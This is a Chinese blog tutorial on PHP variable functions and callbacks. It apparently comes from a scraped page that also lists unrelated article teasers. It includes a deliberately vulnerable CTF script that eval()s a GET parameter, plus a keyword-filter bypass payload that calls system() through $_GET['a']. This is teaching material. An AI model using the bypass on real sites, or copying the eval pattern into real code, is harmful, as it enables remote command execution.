当前位置：首页 > news >正文

php基础学习之可变函数（web渗透测试关键字绕过rce和回调函数）

news 2025/6/8 7:37:32

可变函数

看可变函数的知识点之前，蒟蒻博主建议你先去看看php的可变变量，会更加方便理解，在本篇博客中的第五块知识点->php基础学习之变量-CSDN博客

描述

当一个变量所保存的值刚好是一个函数的名字（由函数命名规则可知该值必须是字符串），那么就可以通过【变量名()】的形式实现该函数的调用

代码示例

<?php
function test(){echo "test函数被调用了";
}
$var = "test";//变量var中存放字符串test
$var();//通过可变函数语法去调用test函数, 等价于->test();

用途

web渗透中命令执行的关键字绕过

思路

可变函数可用作web渗透测试中绕过关键字实现rce，其思路是将被过滤的函数名作为字符串存放在其它变量中，然后从相应的数组中取出该值，绕过过滤实现函数的执行

测试脚本

下面给出一段靶场代码以供测试，在这段脚本中，我们的目的是绕过被过滤的system关键字，使用system函数执行dir命令（dir是用于windows系统查看文件目录的命令）
<?php
highlight_file(__FILE__);
echo "命令执行，用system函数列出当前目录，这是windows系统" . "<br>";
if (isset($_GET['cmd'])) {$cmd = $_GET['cmd'];if (preg_match("/system/i", $cmd)) {echo "就你还想当黑客？";} else {echo $_GET['a']. " ". $cmd;//展示参数名eval($cmd);//执行命令}
}
payload

解释：在a变量中存放system函数名，然后从$_GET数组中取出该值，按可变函数的语法调用system函数
a=system&cmd=$_GET['a']("dir");
在实际靶场使用也是没问题的！（题目来源：【CTFshow-web30】）

回调函数

思路

参考->C语言回调函数详解（全网最全）-CSDN博客

回调函数是开发中很常用的一种编程技术，回调函数a会被作为参数传递给另一个函数b，并在这个函数b的执行过程中去调用回调函数（a）

在C语言中会使用指针来实现，C++/Java使用引用来实现

php则可以使用可变函数实现——将回调函数的函数名作为参数（字符串）传递给另一个函数后，这个函数就能利用可变函数的语法实现回调

测试脚本
<?php
function Add($x, $y){return $x + $y;
}
function Sub($x, $y){return $x - $y;
}
function Mul($x, $y){return $x * $y;
}
function Div($x, $y){return $x / $y;
}
//↑上面是4个简单的加减乘除四则运算函数的定义
function calculator($x, $y, $op_func){//该函数将实现四则运算echo $op_func($x, $y). "<br>";//op_func中存放着调用calculator函数时传来的运算函数的函数名, 利用可变函数语法实现回调
}
calculator(2, 3, "Add");//5
calculator(2, 3, "Sub");//-1
calculator(2, 3, "Mul");//6
calculator(2, 3, "Div");//0.66666666666667
示例

解释：在调用calculator函数时除了传入操作数外还传入一个运算函数的函数名，calculator函数会接收这三个参数，并利用可变函数的语法对传入的运算函数实现回调

php基础学习之可变函数（web渗透测试关键字绕过rce和回调函数）

可变函数看可变函数的知识点之前，蒟蒻博主建议你先去看看php的可变变量，会更加方便理解，在本篇博客中的第五块知识点->php基础学习之变量-CSDN博客描述当一个变量所保存的值刚好是一个函数的名字（由函数命名规则可知该值必…...

编程日记 2024/2/17 9:50:21

MongoDB聚合操作符：$acos

$acos操作符返回一个值的反余弦。从MongoDB4.2版本开始支持。语法 { $acos: <expression> }$acos接受任何可被解析为值在-1到1之间的表达式，即：-1 < value < 1$acos返回值以弧度为单位，使用$radiansToDegrees操作符可以把输出…...

编程日记 2024/2/17 9:47:16

开源PDF工具 Apache PDFBox 认识及使用(知识点+案例)

文章目录前言源码获取一、认识PDFBox二、导入依赖三、基础功能demo1：读取pdf所有内容demo2：读取所有页内容（分页）demo3：添加页眉、页脚demo4：添加居中45文字水印demo5：添加图片到右上角参考文…...

编程日记 2024/2/17 9:45:14

微软.NET6开发的C#特性——委托和事件

我是荔园微风，作为一名在IT界整整25年的老兵，看到不少初学者在学习编程语言的过程中如此的痛苦，我决定做点什么，下面我就重点讲讲微软.NET6开发人员需要知道的C#特性，然后比较其他各种语言进行认识。 C#经历了多年发展…...

编程日记 2024/2/17 9:39:09

卷积神经网络的基本结构

卷积神经网络的基本结构与传统的全连接神经网络一样，卷积神经网络依然是一个层级网络，只不过层的功能和形式发生了变化。典型的CNN结构包括： 数据输入层（Input Layer）卷积层（Convolutional Layer&#x…...

编程日记 2024/2/17 9:37:07

python：使用GDAL库读取遥感影像指定行列数/经纬度坐标的像素值

作者：CSDN @ _养乐多_ 本文将介绍如何使用GDAL库来读取单波段遥感影像数据，如何获取指定行列位置的像素的经纬度坐标，并根据像素行列数或者经纬度坐标获取像素值。代码由python实现。文章目录一、读取影像二、获取指定行列位置的像素坐标三、根据地理坐标获取像素值四、根…...

编程日记 2024/2/17 9:36:04

Redis篇----第一篇

系列文章目录文章目录系列文章目录前言一、什么是 Redis?二、Redis 与其他 key-value 存储有什么不同？三、Redis 的数据类型？四、使用 Redis 有哪些好处？五、Redis 相比 Memcached 有哪些优势？前言前些天发现了一个巨牛的人工智能学习网站，通俗易懂，风趣幽默，忍不住…...

编程日记 2024/2/17 9:33:02

C语言-----用二维数组解决菱形的打印问题

1.打印菱形，多组输入，一个整数（2~20），表示输出的行数，也表示组成“X”的反斜线和正斜线的长度。 #include <stdio.h>int main() {int n0;while(scanf("%d",&n)! EOF){int i0;int j0;f…...

编程日记 2024/2/17 9:30:59

.NET Core WebAPI中使用swagger版本控制，添加注释

一、效果二、实现步骤在代码中添加注释在项目属性中生成API文档在Program中注册Swagger服务并配置文档信息 // 添加swagger注释 builder.Services.AddSwaggerGen(x > {x.SwaggerDoc("v1", new OpenApiInfo { Title "Swagger标题", Version "…...

编程日记 2024/2/17 9:29:58

css篇---移动端适配的方案有哪几种

移动端适配移动端适配是指同一个页面可以在不同的移动端设备上都有合理的布局。主流实现的方案有响应式布局通过rem或者vw,vh 等实现不同设备有相同的比例而实现适配首先需要了解viewport 【视口】视口代表了一个可看见的多边形区域（通常来说是矩形&#xff0…...

编程日记 2024/2/17 9:28:57

一、部署Oracle

部署Oracle 一、Docker部署1.Oracle11g1.1 测试环境1.1.1 拉取镜像1.1.2 启动容器1.1.3 配置容器环境变量1.1.4 修改sys、system用户密码1.1.5 创建表空间1.1.6 创建用户并授权1.1.5 使用DBeaver测试连接二、安装包部署一、Docker部署 1.Oracle11g 1.1 测试环境当前只能用…...

编程日记 2024/2/17 9:27:55

11-编写自动化测试

上一篇： 10-通用类型、特质和生命周期 Edsger W. Dijkstra 在 1972 年发表的文章《The Humble Programmer》中说："程序测试可以非常有效地显示错误的存在，但对于显示错误的不存在却无能为力。这并不意味着我们不应该尽可能多地进行测试&…...

编程日记 2024/2/17 9:26:54

爱上JVM——常见问题（一）：JVM组成

1 JVM组成 1.1 JVM由那些部分组成，运行流程是什么？ 难易程度：☆☆☆ 出现频率：☆☆☆☆ JVM是什么 Java Virtual Machine Java程序的运行环境（java二进制字节码的运行环境） 好处： 一次编写&…...

编程日记 2024/2/17 9:23:52

C#系列-EF扩展框架AutoMapper应用实例（40）

AutoMapper是一个对象到对象的映射器，它用于将一个对象的属性映射到另一个对象的属性。它主要用于在应用程序的不同层之间传输数据时，自动将数据传输对象（DTOs）映射到领域模型，或者将领域模型映射到视图模型等。下面…...

编程日记 2024/2/17 9:20:49

DataX源码分析-插件机制

系列文章目录一、DataX详解和架构介绍二、DataX源码分析 JobContainer 三、DataX源码分析 TaskGroupContainer 四、DataX源码分析 TaskExecutor 五、DataX源码分析 reader 六、DataX源码分析 writer 七、DataX源码分析 Channel 八、DataX源码分析-插件机制文章目录系列文章…...

编程日记 2024/2/17 9:18:47

容器高级知识：适配器模式与 Sidecar 模式的区别

适配器模式与 Sidecar 模式的区别在 Kubernetes 中，适配器模式和 Sidecar 模式都是扩展您的主应用程序容器功能的方法，但它们具有不同的目的和功能： Sidecar 模式： 通用目的： 为主应用程序提供补充功能&#xff0…...

编程日记 2024/2/17 9:16:45

使用Xdisplay将ipad作为扩展显示器Agent闪退问题

1. 正常流程贴子挺多，可以参考这几篇 https://blog.csdn.net/Shi_Xueqing/article/details/129744496 如何将ipad作为win10的扩展屏（使用USB线连接）_ipad win usb 上网-CSDN博客 2.在进行pc端软件设置的时候发生闪退解决方法&#xff1a…...

编程日记 2024/2/17 9:14:43

DVXplorer事件相机入门

DV官方文档：Get Started DV (inivation.gitlab.io) DV事件相机的ROS包：https://github.com/uzh-rpg/rpg_dvs_ros 事件相机的资源汇总：https://github.com/uzh-rpg/event-based_vision_resources 1.DV事件相机ROS包驱动程序安装注意&#x…...

编程日记 2024/2/17 9:13:41

ubuntu屏幕小的解决办法

1. 安装vmware tools , 再点自适应客户机执行里面的vmware-install.pl这个文件 ：sudo ./vmware-install.pl 执行不了可以放到家目录，我放在了/home/book 里面最后点这个自适应客户机然后我这里点不了是因为我点了控制台视图和拉伸客户机&#xff0c…...

编程日记 2024/2/17 9:04:32

黑群晖一键修复：root、AME、DTS、转码、CPU型号等

食用方法：SSH连接群晖使用临时root权限执行 AME3.x激活补丁只适用于x86_64的：DSM7.x Advanced Media Extensions (AME)版本3.0.1-2004、3.1.0-3005 激活过程需要下载官方的解码包，过程较慢，耐心等待。。。 DSM7.1和7.2的AME版…...

编程日记 2024/2/17 9:02:30

Flutter知识点汇总

Flutter架构解析 1. Flutter 是什么？它与其他移动开发框架有什么不同？ Flutter 是 Google 开发的开源移动应用开发框架，可用于快速构建高性能、高保真的移动应用（iOS 和 Android），也支持 Web、桌面和嵌入式设备。。它与其他移动开发框架（如 React Native、Xamarin、原…...

编程新知 2025/6/8 7:11:55

Ansible自动化运维全解析：从设计哲学到实战演进

一、Ansible的设计哲学：简单即正义在DevOps工具链中，Ansible以其"无代理架构（Agentless）"设计独树一帜。这个用Python编写的自动化引擎，通过SSH协议与目标主机通信，彻底摒弃了传统配置管理工具…...

编程新知 2025/6/8 6:22:57

OpenCV 图像色彩空间转换与抠图

一、知识点: 1、色彩空间转换函数 (1)、void cvtColor( InputArray src, OutputArray dst, int code, int dstCn 0, AlgorithmHint hint cv::ALGO_HINT_DEFAULT ); (2)、将图像从一种颜色空间转换为另一种。 (3)、参数说明: src: 输入图像，即要进行颜…...

编程新知 2025/6/8 4:06:04

Go 中的 Map 与字符处理指南

Go 中的 Map 与字符处理指南在 Go 中，map 可以存储字符，但需要理解字符在 Go 中的表示方式。在 Go 语言中，"字符" 实际上有两种表示方法：byte（ASCII 字符）和 rune（Unicode 字符&…...

编程新知 2025/6/8 4:03:51

《前端面试题：JS数据类型》

JavaScript 数据类型指南：从基础到高级全解析一、JavaScript 数据类型概述 JavaScript 作为一门动态类型语言，其数据类型系统是理解这门语言的核心基础。在 ECMAScript 标准中，数据类型分为两大类： 1. 原始类型（Pr…...

编程新知 2025/6/7 23:31:38

永磁同步电机控制算法--模糊PI转速控制器

一、原理介绍在常规的PID控制系统的基础上提出了一种模糊PID以及矢量变换方法相结合的控制系统，经过仿真分析对比证明： 模糊PID控制系统能够有效的提高永磁同步电机的转速响应速度，降低转矩脉动，增强了整体控制系统的抗干扰能力…...

编程新知 2025/6/7 21:29:01

CMake 为 Debug 版本的库或可执行文件添加 d 后缀

在使用 CMake 构建项目时，我们经常需要区分 Debug 和 Release 构建版本。一个常见的做法是为 Debug 版本的库或可执行文件添加后缀（如 d），例如 libmylibd.so 或 myappd.exe。本文将介绍几种在 CMake 中实现为 Debug 版本自动添加 d 后缀的方法。方法一：使用 CMAKE_DEBU…...

编程新知 2025/6/7 17:26:12